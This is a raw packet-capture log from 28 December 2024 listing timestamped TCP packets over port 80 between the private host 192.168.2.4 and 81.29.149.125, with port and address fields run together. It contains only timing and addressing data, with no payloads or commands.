                                                          Dec 28, 2024 09:42:51.796658993 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.796809912 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.871735096 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.871769905 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.871889114 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.871925116 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.871953011 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.871979952 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.871994019 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.872145891 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.872185946 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.872278929 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.872490883 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.872617006 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.872705936 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.872797012 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.872895956 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.872930050 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873034000 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873178959 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873322964 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873332024 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873338938 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873388052 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873404026 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873480082 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873512983 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873548031 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873585939 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873693943 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.873743057 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873753071 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873842955 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873855114 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.873882055 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.873884916 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.873924017 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.873987913 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874011040 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874031067 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.874047995 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.874102116 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874142885 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.874233007 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874283075 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874334097 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874370098 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874495029 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874504089 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874515057 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874551058 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874614000 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874644995 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874742031 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874753952 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874778986 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874804020 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874871969 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874881983 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874989033 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.874998093 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875101089 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875109911 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875174046 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875201941 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875469923 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875478983 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875482082 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875488997 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875552893 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875561953 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875588894 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.875643015 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.916336060 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.931408882 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.931576014 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.931746006 CET4973180192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:51.991626024 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.991660118 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.991671085 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.991705894 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.991776943 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.991799116 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.991874933 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.991940022 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.991951942 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993329048 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993355989 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993416071 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993433952 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993527889 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993546963 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993626118 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993653059 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993774891 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993786097 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993856907 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993865967 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993942022 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.993988991 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994060993 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994092941 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994179964 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994189978 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994246006 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994263887 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994366884 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994378090 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994434118 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994442940 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994466066 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994496107 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994579077 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994590044 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994642973 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994652987 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994671106 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994699001 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994764090 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994815111 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994853020 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994863987 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994944096 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.994954109 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995022058 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995032072 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995091915 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995101929 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995131016 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995162010 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995206118 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995246887 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995273113 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995290995 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995373011 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995383978 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995440960 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995505095 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995584011 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:51.995601892 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.051023006 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.051114082 CET804973181.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.242765903 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.362384081 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.362581015 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.362814903 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.482388020 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482470989 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.482544899 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482600927 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.482601881 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482620001 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482652903 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.482678890 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482691050 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482697964 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.482722998 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.482742071 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.482777119 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482784986 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482829094 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.482918024 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482928991 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.482966900 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.482990026 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.602037907 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.602068901 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.602086067 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.602093935 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.602113008 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.602143049 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.602155924 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.602209091 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.602219105 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.602256060 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.648658037 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.648796082 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.768301964 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.768383026 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.808715105 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.808777094 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:52.930149078 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:52.930217028 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.092685938 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.092768908 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.292726040 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.292804003 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.380666971 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.380971909 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.381072044 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.412264109 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.412384033 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.500633955 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.500678062 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.500736952 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.500797033 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.500797033 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.500850916 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.500890970 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.500930071 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.500942945 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.500993013 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.501038074 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501080036 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.501087904 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501133919 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.501148939 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501192093 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.501203060 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501247883 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.501260996 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501310110 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.501395941 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501437902 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.501451015 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501506090 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.501707077 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501724005 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501758099 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.501811028 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.501941919 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502005100 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502125978 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502209902 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502423048 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502549887 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502583981 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502757072 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502789021 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502801895 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502859116 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.502871037 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502914906 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.502944946 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502978086 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.502991915 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.503020048 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.503053904 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.503106117 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.503113031 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.503153086 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.531935930 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.531989098 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.576777935 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.576823950 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.621864080 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.621906996 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622031927 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.622112036 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622148037 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622243881 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622307062 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622391939 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622452021 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622494936 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622575045 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622625113 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622704983 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622766972 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622819901 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622859001 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622896910 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.622986078 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623028040 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623042107 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623111010 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623120070 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623195887 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623220921 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623291016 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623331070 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623356104 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623409986 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623414040 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.623473883 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.623524904 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623533964 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623570919 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.623696089 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623706102 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623743057 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623745918 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.623752117 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623827934 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623838902 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623874903 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623883009 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623914957 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.623924017 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624108076 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624128103 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624206066 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624213934 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624222994 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624258995 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624267101 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624286890 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624401093 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624408960 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624460936 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624517918 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624581099 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624589920 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624711037 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624722004 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624869108 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.624876976 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.625072956 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.625081062 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.625091076 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.625099897 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.625164032 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.625171900 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.625180006 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.651451111 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.651572943 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.691572905 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.691828012 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.691891909 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.692079067 CET4973280192.168.2.481.29.149.125
                                                          Dec 28, 2024 09:42:53.696969032 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.741571903 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.741599083 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.741631985 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.741641045 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.741662025 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.742988110 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.742997885 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743010044 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743026018 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743093014 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743119001 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743189096 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743196964 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743300915 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743309975 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743379116 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743387938 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743462086 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743486881 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743565083 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743588924 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743617058 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743633032 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743731022 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743740082 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743782043 CET804973281.29.149.125192.168.2.4
                                                          Dec 28, 2024 09:42:53.743833065 CET804973281.29.149.125192.168.2.4
